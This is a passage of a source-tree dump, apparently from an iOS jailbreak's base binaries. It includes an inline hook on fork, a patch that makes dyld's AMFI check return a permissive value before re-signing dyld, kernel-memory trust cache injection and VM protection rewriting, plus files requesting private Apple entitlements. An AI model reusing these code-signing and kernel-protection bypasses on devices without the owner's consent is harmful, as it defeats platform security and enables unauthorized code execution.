cd "jbctl" 41 | make clean 42 | cd - 43 | 44 | # launchdhook 45 | cd "launchdhook" 46 | make clean 47 | cd - 48 | 49 | # systemhook 50 | cd "systemhook" 51 | make clean 52 | cd - 53 | 54 | # watchdoghook 55 | cd "watchdoghook" 56 | make clean 57 | cd - 58 | 59 | # rootlesshooks 60 | cd "rootlesshooks" 61 | make clean 62 | cd - 63 | 64 | # forkfix 65 | cd "forkfix" 66 | make clean 67 | cd - 68 | 69 | cd "$PREV_DIR" -------------------------------------------------------------------------------- /BaseBin/forkfix/Makefile: -------------------------------------------------------------------------------- 1 | TARGET = forkfix.dylib 2 | CC = clang 3 | 4 | CFLAGS = -I../_shared -I./src -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path) -arch arm64e -miphoneos-version-min=15.0 -O2 5 | LDFLAGS = -dynamiclib ../systemhook/systemhook.dylib 6 | 7 | sign: $(TARGET) 8 | @ldid -S $^ 9 | 10 | $(TARGET): $(wildcard src/*.c src/*.S) 11 | $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ 12 | install_name_tool -change "systemhook.dylib" "/usr/lib/systemhook.dylib" $@ 13 | 14 | clean: 15 | @rm -f $(TARGET) -------------------------------------------------------------------------------- /BaseBin/forkfix/src/litehook.c: -------------------------------------------------------------------------------- 1 | #include "litehook.h" 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | 15 | static uint64_t __attribute((naked)) __xpaci(uint64_t a) 16 | { 17 | asm(".long 0xDAC143E0"); // XPACI X0 18 | asm("ret"); 19 | } 20 | 21 | uint64_t xpaci(uint64_t a) 22 | { 23 | // If a looks like a non-pac'd pointer just return it 24 | if ((a & 0xFFFFFF0000000000) == 0xFFFFFF0000000000) { 25 | return a; 26 | } 27 | return __xpaci(a); 28 | } 29 | 30 | uint32_t movk(uint8_t x, uint16_t val, uint16_t lsl) 31 | { 32 | uint32_t base = 0b11110010100000000000000000000000; 33 | 34 | uint32_t hw = 0; 35 | if (lsl == 16) { 36 | hw = 0b01 << 21; 37 | } 38 | else if (lsl == 32) { 39 | hw = 0b10 << 21; 40 | } 41 | else if (lsl == 48) { 42 | hw = 0b11 << 21; 43 | } 44 | 45 | uint32_t imm16 = (uint32_t)val << 5; 46 | uint32_t rd = x & 0x1F; 47 | 48 | return base | hw | imm16 | rd; 49 | } 50 | 51 | uint32_t br(uint8_t x) 52 | { 53 | uint32_t base = 0b11010110000111110000000000000000; 54 | uint32_t rn = ((uint32_t)x & 0x1F) << 5; 55 | return base | rn; 56 | } 57 | 58 | __attribute__((noinline, naked)) volatile kern_return_t litehook_vm_protect(mach_port_name_t target, mach_vm_address_t address, mach_vm_size_t size, boolean_t set_maximum, vm_prot_t new_protection) 59 | { 60 | __asm("mov x16, #0xFFFFFFFFFFFFFFF2"); 61 | __asm("svc 0x80"); 62 | __asm("ret"); 63 | } 64 | 65 | kern_return_t litehook_unprotect(vm_address_t addr, vm_size_t size) 66 | { 67 | return litehook_vm_protect(mach_task_self(), addr, size, false, VM_PROT_READ | VM_PROT_WRITE | VM_PROT_COPY); 68 | } 69 | 70 | kern_return_t litehook_protect(vm_address_t addr, vm_size_t size) 71 | { 72 | return litehook_vm_protect(mach_task_self(), addr, size, false, VM_PROT_READ | VM_PROT_EXECUTE); 73 | } 74 | 75 | kern_return_t litehook_hook_function(void *source, void *target) 76 | { 77 | kern_return_t kr = KERN_SUCCESS; 78 | 79 | uint32_t *toHook = (uint32_t*)xpaci((uint64_t)source); 80 | uint64_t target64 = (uint64_t)xpaci((uint64_t)target); 81 | 82 | kr = litehook_unprotect((vm_address_t)toHook, 5*4); 83 | if (kr != KERN_SUCCESS) return kr; 84 | 85 | toHook[0] = movk(16, target64 >> 0, 0); 86 | toHook[1] = movk(16, target64 >> 16, 16); 87 | toHook[2] = movk(16, target64 >> 32, 32); 88 | toHook[3] = movk(16, target64 >> 48, 48); 89 | toHook[4] = br(16); 90 | uint32_t hookSize = 5 * sizeof(uint32_t); 91 | 92 | kr = litehook_protect((vm_address_t)toHook, hookSize); 93 | if (kr != KERN_SUCCESS) return kr; 94 | 95 | sys_icache_invalidate(toHook, hookSize); 96 | 97 | return KERN_SUCCESS; 98 | } -------------------------------------------------------------------------------- /BaseBin/forkfix/src/litehook.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | kern_return_t litehook_hook_function(void *source, void *target); -------------------------------------------------------------------------------- /BaseBin/forkfix/src/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include "syscall.h" 9 | #include "litehook.h" 10 | 11 | extern int64_t jbdswForkFix(pid_t childPid); 12 | extern void _malloc_fork_prepare(void); 13 | extern void _malloc_fork_parent(void); 14 | extern void xpc_atfork_prepare(void); 15 | extern void xpc_atfork_parent(void); 16 | extern void dispatch_atfork_prepare(void); 17 | extern void dispatch_atfork_parent(void); 18 | extern void __fork(void); 19 | 20 | int childToParentPipe[2]; 21 | int parentToChildPipe[2]; 22 | static void openPipes(void) 23 | { 24 | if (pipe(parentToChildPipe) < 0 || pipe(childToParentPipe) < 0) { 25 | abort(); 26 | } 27 | } 28 | static void closePipes(void) 29 | { 30 | if (ffsys_close(parentToChildPipe[0]) != 0 || ffsys_close(parentToChildPipe[1]) != 0 || ffsys_close(childToParentPipe[0]) != 0 || ffsys_close(childToParentPipe[1]) != 0) { 31 | abort(); 32 | } 33 | } 34 | 35 | void child_fixup(void) 36 | { 37 | // Tell parent we are waiting for fixup now 38 | char msg = ' '; 39 | ffsys_write(childToParentPipe[1], &msg, sizeof(msg)); 40 | 41 | // Wait until parent completes fixup 42 | ffsys_read(parentToChildPipe[0], &msg, sizeof(msg)); 43 | } 44 | 45 | void parent_fixup(pid_t childPid) 46 | { 47 | // Reenable some system functionality that XPC is dependent on and XPC itself 48 | // (Normally unavailable during __fork) 49 | _malloc_fork_parent(); 50 | dispatch_atfork_parent(); 51 | xpc_atfork_parent(); 52 | 53 | // Wait until the child is ready and waiting 54 | char msg = ' '; 55 | read(childToParentPipe[0], &msg, sizeof(msg)); 56 | 57 | // Child is waiting for wx_allowed + permission fixups now 58 | // Apply fixup 59 | int64_t fix_ret = jbdswForkFix(childPid); 60 | if (fix_ret != 0) { 61 | kill(childPid, SIGKILL); 62 | abort(); 63 | } 64 | 65 | // Tell child we are done, this will make it resume 66 | write(parentToChildPipe[1], &msg, sizeof(msg)); 67 | 68 | // Disable system functionality related to XPC again 69 | _malloc_fork_prepare(); 70 | dispatch_atfork_prepare(); 71 | xpc_atfork_prepare(); 72 | } 73 | 74 | __attribute__((visibility ("default"))) pid_t forkfix___fork(void) 75 | { 76 | openPipes(); 77 | 78 | pid_t pid = ffsys_fork(); 79 | if (pid < 0) { 80 | closePipes(); 81 | return pid; 82 | } 83 | 84 | if (pid == 0) { 85 | child_fixup(); 86 | } 87 | else { 88 | parent_fixup(pid); 89 | } 90 | 91 | closePipes(); 92 | return pid; 93 | } 94 | 95 | __attribute__((constructor)) static void initializer(void) 96 | { 97 | litehook_hook_function((void *)&__fork, (void *)&forkfix___fork); 98 | } -------------------------------------------------------------------------------- /BaseBin/forkfix/src/syscall.S: -------------------------------------------------------------------------------- 1 | .text 2 | 3 | .align 4 4 | 5 | .global _ffsys_fork 6 | _ffsys_fork: 7 | pacibsp 8 | stp x29, x30, [SP, #-0x10]! 9 | mov x29, sp 10 | mov x16, #2 11 | svc 0x80 12 | b.cs _ffsys_fork_err 13 | cbz x1, _ffsys_fork_end 14 | mov w0, #0 15 | adrp x9, __current_pid@GOTPAGE 16 | ldr x9, [x9, __current_pid@GOTPAGEOFF] 17 | str w0, [x9] 18 | b _ffsys_fork_end 19 | 20 | _ffsys_fork_err: 21 | bl _cerror 22 | mov w0, #-1 23 | 24 | _ffsys_fork_end: 25 | mov sp, x29 26 | ldp x29, x30, [SP],#0x10 27 | retab 28 | 29 | .global _ffsys_vm_protect 30 | _ffsys_vm_protect: 31 | mov x16, #-14 32 | svc 0x80 33 | ret 34 | 35 | .global _ffsys_getpid 36 | _ffsys_getpid: 37 | mov x16, #20 38 | svc 0x80 39 | ret 40 | 41 | .global _ffsys_pid_suspend 42 | _ffsys_pid_suspend: 43 | mov x16, #433 44 | svc 0x80 45 | ret 46 | 47 | .global _ffsys_read 48 | _ffsys_read: 49 | mov x16, #3 50 | svc 0x80 51 | ret 52 | 53 | .global _ffsys_write 54 | _ffsys_write: 55 | mov x16, #4 56 | svc 0x80 57 | ret 58 | 59 | .global _ffsys_close 60 | _ffsys_close: 61 | mov x16, #6 62 | svc 0x80 63 | ret 64 | -------------------------------------------------------------------------------- /BaseBin/forkfix/src/syscall.h: -------------------------------------------------------------------------------- 1 | kern_return_t ffsys_vm_protect(vm_map_t target_task, vm_address_t address, vm_size_t size, boolean_t set_maximum, vm_prot_t new_protection); 2 | pid_t ffsys_fork(void); 3 | pid_t ffsys_getpid(void); 4 | int ffsys_pid_suspend(pid_t pid); 5 | 6 | ssize_t ffsys_read(int fildes, void *buf, size_t nbyte); 7 | ssize_t ffsys_write(int fildes, const void *buf, size_t nbyte); 8 | int ffsys_close(int fildes); 9 | -------------------------------------------------------------------------------- /BaseBin/forkfix/upload.sh: -------------------------------------------------------------------------------- 1 | set -e 2 | 3 | PROJECT_NAME=forkfix.dylib 4 | DEVICE=root@localhost 5 | PORT=2222 6 | 7 | make 8 | ssh $DEVICE -p $PORT "rm -rf /var/jb/usr/lib/$PROJECT_NAME" 9 | scp -P$PORT ./$PROJECT_NAME $DEVICE:/var/jb/usr/lib/$PROJECT_NAME 10 | -------------------------------------------------------------------------------- /BaseBin/idownloadd/Makefile: -------------------------------------------------------------------------------- 1 | XCODE_PROJECT = src/idownloadd.xcodeproj 2 | XCODE_SCHEME = idownloadd 3 | CS_FLAGS = CODE_SIGN_IDENTITY="" CODE_SIGNING_REQUIRED=NO CODE_SIGNING_ALLOWED=NO 4 | CONFIGURATION = Release 5 | 6 | OUTPUT_NAME = idownloadd 7 | 8 | build: 9 | xcodebuild -archivePath ./.build -project $(XCODE_PROJECT) -scheme $(XCODE_SCHEME) -configuration $(CONFIGURATION) -destination generic/platform=iOS archive $(CS_FLAGS) 10 | @cp -f ./.build.xcarchive/Products/usr/local/bin/$(OUTPUT_NAME) . 11 | @rm -rf ./.build.xcarchive 12 | @install_name_tool -change "/var/jb/basebin/libjailbreak.dylib" "@loader_path/libjailbreak.dylib" $(OUTPUT_NAME) 13 | @ldid -Sentitlements.plist $(OUTPUT_NAME) 14 | 15 | clean: 16 | xcodebuild -project $(XCODE_PROJECT) -scheme $(XCODE_SCHEME) -configuration $(CONFIGURATION) -destination generic/platform=iOS clean 17 | @rm $(OUTPUT_NAME) 18 | 19 | default: build -------------------------------------------------------------------------------- /BaseBin/idownloadd/daemon.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Label 6 | com.opa334.idownloadd 7 | ProgramArguments 8 | 9 | basebin/idownloadd 10 | 11 | UserName 12 | root 13 | RunAtLoad 14 | 15 | KeepAlive 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /BaseBin/idownloadd/entitlements.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | platform-application 6 | 7 | com.apple.private.security.no-container 8 | 9 | com.apple.private.security.storage.AppBundles 10 | 11 | com.apple.private.security.storage.AppDataContainers 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /BaseBin/idownloadd/src/idownloadd.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /BaseBin/idownloadd/src/idownloadd.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | IDEDidComputeMac32BitWarning 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /BaseBin/idownloadd/src/idownloadd.xcodeproj/project.xcworkspace/xcshareddata/swiftpm/Package.resolved: -------------------------------------------------------------------------------- 1 | { 2 | "pins" : [ 3 | { 4 | "identity" : "idownload", 5 | "kind" : "remoteSourceControl", 6 | "location" : "https://github.com/pinauten/iDownload", 7 | "state" : { 8 | "branch" : "master", 9 | "revision" : "62920e864f06af4b0a50a0aa9b6e0a7c7bd83a6f" 10 | } 11 | }, 12 | { 13 | "identity" : "swiftutils", 14 | "kind" : "remoteSourceControl", 15 | "location" : "https://github.com/pinauten/SwiftUtils", 16 | "state" : { 17 | "branch" : "master", 18 | "revision" : "1d37faabb4c58b3152394c9b6e1c1a68507646b9" 19 | } 20 | } 21 | ], 22 | "version" : 2 23 | } 24 | -------------------------------------------------------------------------------- /BaseBin/idownloadd/src/idownloadd/iDownloadCmds.swift: -------------------------------------------------------------------------------- 1 | // 2 | // iDownloadCMDs.swift 3 | // idownloadd 4 | // 5 | // Created by Lars Fröder on 08.06.23. 6 | // 7 | 8 | import Foundation 9 | import iDownload 10 | 11 | let iDownloadCmds = [ 12 | "help": iDownload_help 13 | ] as [String: iDownloadCmd] 14 | 15 | func iDownload_help(_ hndlr: iDownloadHandler, _ cmd: String, _ args: [String]) throws { 16 | try hndlr.sendline("") 17 | } 18 | -------------------------------------------------------------------------------- /BaseBin/idownloadd/src/idownloadd/idownloadd-Bridging-Header.h: -------------------------------------------------------------------------------- 1 | // 2 | // idownloadd-Bridging-Header.h 3 | // idownloadd 4 | // 5 | // Created by Lars Fröder on 08.06.23. 6 | // 7 | 8 | #ifndef idownloadd_Bridging_Header_h 9 | #define idownloadd_Bridging_Header_h 10 | 11 | #import 12 | 13 | #import 14 | #import 15 | #import 16 | 17 | #endif /* idownloadd_Bridging_Header_h */ 18 | -------------------------------------------------------------------------------- /BaseBin/idownloadd/src/idownloadd/main.swift: -------------------------------------------------------------------------------- 1 | // 2 | // main.swift 3 | // idownloadd 4 | // 5 | // Created by Lars Fröder on 08.06.23. 6 | // 7 | 8 | import Foundation 9 | import iDownload 10 | 11 | jbdInitPPLRW(); 12 | 13 | do { 14 | try iDownload.launch_iDownload(krw: iDownloadKRW(), otherCmds: iDownloadCmds) 15 | } catch let e { 16 | NSLog("Failed to launch iDownload: \(e)") 17 | exit(1) 18 | } 19 | 20 | RunLoop.main.run() 21 | -------------------------------------------------------------------------------- /BaseBin/jailbreakd/Makefile: -------------------------------------------------------------------------------- 1 | TARGET = jailbreakd 2 | 3 | CC = clang 4 | 5 | CFLAGS = -framework Foundation -framework CoreServices -framework Security -I../_shared -I./src -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path) -arch arm64e -miphoneos-version-min=15.0 -fobjc-arc -Wno-nullability-completeness-on-arrays -DBUNDLE_ID=page.liam.Dopamine -O3 6 | LDFLAGS = -L../libjailbreak -ljailbreak -lbsm -larchive 7 | 8 | sign: $(TARGET) 9 | @ldid -Sentitlements.plist $< 10 | 11 | $(TARGET): $(wildcard src/*.m src/*.S src/machoparse/*.c) 12 | $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ 13 | install_name_tool -change "/var/jb/basebin/libjailbreak.dylib" "@loader_path/libjailbreak.dylib" $@ 14 | 15 | clean: 16 | @rm -f $(TARGET) 17 | -------------------------------------------------------------------------------- /BaseBin/jailbreakd/README.md: -------------------------------------------------------------------------------- 1 | # Dopamine Base Binaries 2 | 3 | ## jailbreakd 4 | 5 | ### Supported 6 | 7 | 8 | Dopamine -> jailbreakd: 9 | - XPC call to jailbreakd, make it create a thread and return it -------------------------------------------------------------------------------- /BaseBin/jailbreakd/daemon.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | ProcessType 6 | Interactive 7 | Label 8 | com.opa334.jailbreakd 9 | MachServices 10 | 11 | com.opa334.jailbreakd 12 | 13 | HostSpecialPort 14 | 16 15 | 16 | com.opa334.jailbreakd.systemwide 17 | 18 | 19 | ProgramArguments 20 | 21 | basebin/jailbreakd 22 | 23 | UserName 24 | root 25 | RunAtLoad 26 | 27 | KeepAlive 28 | 29 | 30 | 31 | -------------------------------------------------------------------------------- /BaseBin/jailbreakd/entitlements.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | platform-application 6 | 7 | task_for_pid-allow 8 | 9 | com.apple.private.security.no-container 10 | 11 | com.apple.private.amfi.can-check-trust-cache 12 | 13 | com.apple.security.exception.iokit-user-client-class 14 | 15 | AppleMobileFileIntegrityUserClient 16 | 17 | com.apple.private.bindfs-allow 18 | 19 | com.apple.private.coreservices.canmaplsdatabase 20 | 21 | com.apple.private.security.storage.AppBundles 22 | 23 | com.apple.private.security.storage.AppDataContainers 24 | 25 | com.apple.private.xpc.launchd.userspace-reboot 26 | 27 | com.apple.springboard.CFUserNotification 28 | 29 | 30 | 31 | -------------------------------------------------------------------------------- /BaseBin/jailbreakd/src/JBDTCPage.h: -------------------------------------------------------------------------------- 1 | #import 2 | 3 | #import "trustcache_structs.h" 4 | 5 | // 742 cdhashes fit into one page 6 | #define TC_ENTRY_COUNT_PER_PAGE 742 7 | 8 | @class JBDTCPage; 9 | 10 | extern NSMutableArray *gTCPages; 11 | extern NSMutableArray *gTCUnusedAllocations; 12 | BOOL tcPagesRecover(void); 13 | void tcPagesChanged(void); 14 | 15 | 16 | @interface JBDTCPage : NSObject 17 | { 18 | trustcache_page* _page; 19 | } 20 | 21 | @property (nonatomic) uint64_t kaddr; 22 | 23 | - (instancetype)initWithKernelAddress:(uint64_t)kaddr; 24 | - (instancetype)initAllocateAndLink; 25 | 26 | - (void)sort; 27 | - (uint32_t)amountOfSlotsLeft; 28 | - (BOOL)addEntry:(trustcache_entry)entry; 29 | - (BOOL)removeEntry:(trustcache_entry)entry; 30 | 31 | - (void)unlinkAndFree; 32 | 33 | @end -------------------------------------------------------------------------------- /BaseBin/jailbreakd/src/codesign.h: -------------------------------------------------------------------------------- 1 | #import 2 | int resignFile(NSString *filePath, bool preserveMetadata); -------------------------------------------------------------------------------- /BaseBin/jailbreakd/src/dyld_patch.h: -------------------------------------------------------------------------------- 1 | #import 2 | int applyDyldPatches(NSString *dyldPath); -------------------------------------------------------------------------------- /BaseBin/jailbreakd/src/dyld_patch.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import "codesign.h" 3 | #import 4 | #import 5 | 6 | int applyDyldPatches(NSString *dyldPath) 7 | { 8 | // Find offsets by abusing CoreSymbolication APIs 9 | void *csHandle = dlopen("/System/Library/PrivateFrameworks/CoreSymbolication.framework/CoreSymbolication", RTLD_NOW); 10 | CSSymbolicatorRef (*__CSSymbolicatorCreateWithPathAndArchitecture)(const char* path, cpu_type_t type) = dlsym(csHandle, "CSSymbolicatorCreateWithPathAndArchitecture"); 11 | CSSymbolRef (*__CSSymbolicatorGetSymbolWithMangledNameAtTime)(CSSymbolicatorRef cs, const char* name, uint64_t time) = dlsym(csHandle, "CSSymbolicatorGetSymbolWithMangledNameAtTime"); 12 | CSRange (*__CSSymbolGetRange)(CSSymbolRef sym) = dlsym(csHandle, "CSSymbolGetRange"); 13 | //void (*__CSRelease)(CSTypeRef ptr) = dlsym(csHandle, "CSRelease"); 14 | 15 | CSSymbolicatorRef symbolicator = __CSSymbolicatorCreateWithPathAndArchitecture("/usr/lib/dyld", CPU_TYPE_ARM64); 16 | CSSymbolRef symbol = __CSSymbolicatorGetSymbolWithMangledNameAtTime(symbolicator, "__ZN5dyld413ProcessConfig8Security7getAMFIERKNS0_7ProcessERNS_15SyscallDelegateE", 0); 17 | CSRange range = __CSSymbolGetRange(symbol); 18 | //__CSRelease(symbolicator); 19 | //__CSRelease(symbol); 20 | uint64_t getAMFIOffset = range.location; 21 | if (getAMFIOffset == 0) { 22 | return 100; 23 | } 24 | 25 | FILE *dyldFile = fopen(dyldPath.fileSystemRepresentation, "rb+"); 26 | if (!dyldFile) return 101; 27 | fseek(dyldFile, getAMFIOffset, SEEK_SET); 28 | uint32_t patchInstr[2] = { 29 | 0xD2801BE0, // mov x0, 0xDF 30 | 0xD65F03C0 // ret 31 | }; 32 | fwrite(patchInstr, sizeof(patchInstr), 1, dyldFile); 33 | fclose(dyldFile); 34 | JBLogDebug("patched dyld"); 35 | 36 | int csRet = resignFile(dyldPath, true); 37 | if (csRet != 0) { 38 | return csRet; 39 | } 40 | JBLogDebug("resigned dyld"); 41 | 42 | return 0; 43 | } -------------------------------------------------------------------------------- /BaseBin/jailbreakd/src/fakelib.h: -------------------------------------------------------------------------------- 1 | int setFakeLibVisible(bool visible); 2 | int makeFakeLib(void); 3 | bool isFakeLibBindMountActive(void); 4 | int setFakeLibBindMountActive(bool active); 5 | int64_t registerJbPrefixedPath(NSString *sourcePath, int retry); 6 | int64_t bindMountPath(NSString *sourcePath, bool check_existances); 7 | int64_t bindUnmountPath(NSString *sourcePath); 8 | -------------------------------------------------------------------------------- /BaseBin/jailbreakd/src/forkfix.h: -------------------------------------------------------------------------------- 1 | int64_t apply_fork_fixup(pid_t parentPid, pid_t childPid); -------------------------------------------------------------------------------- /BaseBin/jailbreakd/src/forkfix.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | #import 4 | #import 5 | #import 6 | #import 7 | #import 8 | extern int pid_resume(int pid); 9 | 10 | int64_t apply_fork_fixup(pid_t parentPid, pid_t childPid) 11 | { 12 | int64_t retval = 3; 13 | 14 | bool childProcNeedsRelease = false; 15 | uint64_t childProc = proc_for_pid(childPid, &childProcNeedsRelease); 16 | 17 | bool parentProcNeedsRelease = false; 18 | uint64_t parentProc = proc_for_pid(parentPid, &parentProcNeedsRelease); 19 | 20 | if (childProc && parentProc) { 21 | retval = 2; 22 | // Safety check to ensure we are actually coming from fork 23 | if (proc_get_pptr(childProc) == parentProc) { 24 | proc_set_debugged(childProc, false); 25 | 26 | uint64_t childTask = proc_get_task(childProc); 27 | uint64_t childVmMap = task_get_vm_map(childTask); 28 | 29 | uint64_t parentTask = proc_get_task(parentProc); 30 | uint64_t parentVmMap = task_get_vm_map(parentTask); 31 | 32 | uint64_t parentHeader = vm_map_get_header(parentVmMap); 33 | uint64_t parentEntry = vm_map_header_get_first_entry(parentHeader); 34 | uint32_t parentNumEntries = vm_header_get_nentries(parentHeader); 35 | 36 | uint64_t childHeader = vm_map_get_header(childVmMap); 37 | uint64_t childEntry = vm_map_header_get_first_entry(childHeader); 38 | uint32_t childNumEntries = vm_header_get_nentries(childHeader); 39 | 40 | uint32_t curChildIndex = 0; 41 | uint32_t curParentIndex = 0; 42 | while (curChildIndex < childNumEntries && childEntry != 0 && curParentIndex < parentNumEntries && parentEntry != 0) { 43 | uint64_t childStart = 0, childEnd = 0; 44 | vm_entry_get_range(childEntry, &childStart, &childEnd); 45 | uint64_t parentStart = 0, parentEnd = 0; 46 | vm_entry_get_range(parentEntry, &parentStart, &parentEnd); 47 | 48 | if (parentStart < childStart) { 49 | parentEntry = vm_map_entry_get_next_entry(parentEntry); 50 | curParentIndex++; 51 | } 52 | else if (parentStart > childStart) { 53 | childEntry = vm_map_entry_get_next_entry(childEntry); 54 | curChildIndex++; 55 | } 56 | else { 57 | vm_prot_t parentProt = 0, parentMaxProt = 0; 58 | vm_map_entry_get_prot(parentEntry, &parentProt, &parentMaxProt); 59 | vm_prot_t childProt = 0, childMaxProt = 0; 60 | vm_map_entry_get_prot(childEntry, &childProt, &childMaxProt); 61 | 62 | if (parentProt != childProt || parentMaxProt != childMaxProt) { 63 | vm_map_entry_set_prot(childEntry, parentProt, parentMaxProt); 64 | } 65 | 66 | parentEntry = vm_map_entry_get_next_entry(parentEntry); 67 | curParentIndex++; 68 | childEntry = vm_map_entry_get_next_entry(childEntry); 69 | curChildIndex++; 70 | } 71 | } 72 | retval = 0; 73 | } 74 | } 75 | if (childProcNeedsRelease) proc_rele(childProc); 76 | if (parentProcNeedsRelease) proc_rele(parentProc); 77 | 78 | return retval; 79 | } -------------------------------------------------------------------------------- /BaseBin/jailbreakd/src/server.h: -------------------------------------------------------------------------------- 1 | #import 2 | 3 | int reboot3(uint64_t flags, ...); 4 | #define RB2_USERREBOOT (0x2000000000000000llu) 5 | 6 | extern NSDictionary* gBootInfo; 7 | uint64_t bootInfo_getUInt64(NSString* name); 8 | uint64_t bootInfo_getSlidUInt64(NSString* name); 9 | NSData* bootInfo_getData(NSString* name); 10 | 11 | extern uint64_t gSelfProc; 12 | extern uint64_t gSelfTask; 13 | 14 | void primitivesInitializedCallback(void); -------------------------------------------------------------------------------- /BaseBin/jailbreakd/src/spawn_wrapper.h: -------------------------------------------------------------------------------- 1 | #import 2 | int spawn(NSString* path, NSArray* args); -------------------------------------------------------------------------------- /BaseBin/jailbreakd/src/spawn_wrapper.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | #import "spawn_wrapper.h" 4 | #import 5 | extern char **environ; 6 | 7 | int spawn(NSString* path, NSArray* args) 8 | { 9 | NSMutableArray* argsM = args.mutableCopy ?: [NSMutableArray new]; 10 | [argsM insertObject:path atIndex:0]; 11 | 12 | NSUInteger argCount = [argsM count]; 13 | char **argsC = (char **)malloc((argCount + 1) * sizeof(char*)); 14 | 15 | for (NSUInteger i = 0; i < argCount; i++) 16 | { 17 | argsC[i] = strdup([[argsM objectAtIndex:i] UTF8String]); 18 | } 19 | argsC[argCount] = NULL; 20 | 21 | pid_t task_pid; 22 | int status = -200; 23 | int spawnError = posix_spawn(&task_pid, path.fileSystemRepresentation, NULL, NULL, (char *const *)argsC, environ); 24 | for (NSUInteger i = 0; i < argCount; i++) 25 | { 26 | free(argsC[i]); 27 | } 28 | free(argsC); 29 | if (spawnError != 0) return spawnError; 30 | do 31 | { 32 | if (waitpid(task_pid, &status, 0) != -1) { 33 | JBLogDebug("Child status %d", WEXITSTATUS(status)); 34 | } else 35 | { 36 | perror("waitpid"); 37 | return -222; 38 | } 39 | } while (!WIFEXITED(status) && !WIFSIGNALED(status)); 40 | 41 | return WEXITSTATUS(status); 42 | } -------------------------------------------------------------------------------- /BaseBin/jailbreakd/src/trustcache.h: -------------------------------------------------------------------------------- 1 | #import "trustcache_structs.h" 2 | #import 3 | 4 | void dynamicTrustCacheAddEntry(trustcache_entry entry); 5 | void dynamicTrustCacheRemoveEntry(trustcache_entry entry); 6 | void fileEnumerateTrustCacheEntries(NSURL *fileURL, void (^enumerateBlock)(trustcache_entry entry)); 7 | void dynamicTrustCacheUploadFile(NSURL *fileURL); 8 | void dynamicTrustCacheUploadCDHashFromData(NSData *cdHash); 9 | void dynamicTrustCacheUploadCDHashesFromArray(NSArray *cdHashArray); 10 | void dynamicTrustCacheUploadDirectory(NSString *directoryPath); 11 | void rebuildDynamicTrustCache(void); 12 | 13 | BOOL trustCacheListAdd(uint64_t trustCacheKaddr); 14 | BOOL trustCacheListRemove(uint64_t trustCacheKaddr); 15 | uint64_t staticTrustCacheUploadFile(trustcache_file *fileToUpload, size_t fileSize, size_t *outMapSize); 16 | uint64_t staticTrustCacheUploadCDHashesFromArray(NSArray *cdHashArray, size_t *outMapSize);; 17 | uint64_t staticTrustCacheUploadFileAtPath(NSString *filePath, size_t *outMapSize); 18 | -------------------------------------------------------------------------------- /BaseBin/jailbreakd/src/trustcache_structs.h: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | #import 4 | 5 | typedef struct sTrustcache_entry 6 | { 7 | uint8_t hash[CS_CDHASH_LEN]; 8 | uint8_t hash_type; 9 | uint8_t flags; 10 | } __attribute__((__packed__)) trustcache_entry; 11 | 12 | typedef struct sTrustcache_file 13 | { 14 | uint32_t version; 15 | uuid_t uuid; 16 | uint32_t length; 17 | trustcache_entry entries[]; 18 | } __attribute__((__packed__)) trustcache_file; 19 | 20 | typedef struct sTrustcache_page 21 | { 22 | uint64_t nextPtr; 23 | uint64_t selfPtr; 24 | trustcache_file file; 25 | } __attribute__((__packed__)) trustcache_page; 26 | 27 | -------------------------------------------------------------------------------- /BaseBin/jailbreakd/src/update.h: -------------------------------------------------------------------------------- 1 | #import 2 | NSString *trollStoreRootHelperPath(void); 3 | int basebinUpdateFromTar(NSString *basebinPath, bool rebootWhenDone); 4 | int jbUpdateFromTIPA(NSString *tipaPath, bool rebootWhenDone); -------------------------------------------------------------------------------- /BaseBin/jbctl/Makefile: -------------------------------------------------------------------------------- 1 | TARGET = jbctl 2 | 3 | CC = clang 4 | 5 | CFLAGS = -framework Foundation -framework CoreServices -framework Security -I../_shared -I./src -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path) -arch arm64e -miphoneos-version-min=15.0 -fobjc-arc 6 | LDFLAGS = -L../libjailbreak -ljailbreak 7 | 8 | sign: $(TARGET) 9 | @ldid -Sentitlements.plist $< 10 | 11 | $(TARGET): $(wildcard src/*.m) 12 | $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ 13 | install_name_tool -change "/var/jb/basebin/libjailbreak.dylib" "@loader_path/libjailbreak.dylib" $@ 14 | 15 | clean: 16 | @rm -f $(TARGET) -------------------------------------------------------------------------------- /BaseBin/jbctl/entitlements.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | platform-application 6 | 7 | task_for_pid-allow 8 | 9 | com.apple.private.security.no-container 10 | 11 | com.apple.security.exception.mach-lookup.global-name 12 | 13 | com.opa334.jailbreakd 14 | 15 | com.apple.private.xpc.launchd.userspace-reboot 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /BaseBin/jbctl/rebuild_daemon.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | ProcessType 6 | Interactive 7 | Label 8 | com.opa334.trustcache_rebuild 9 | ProgramArguments 10 | 11 | basebin/jbctl 12 | rebuild_trustcache 13 | 14 | 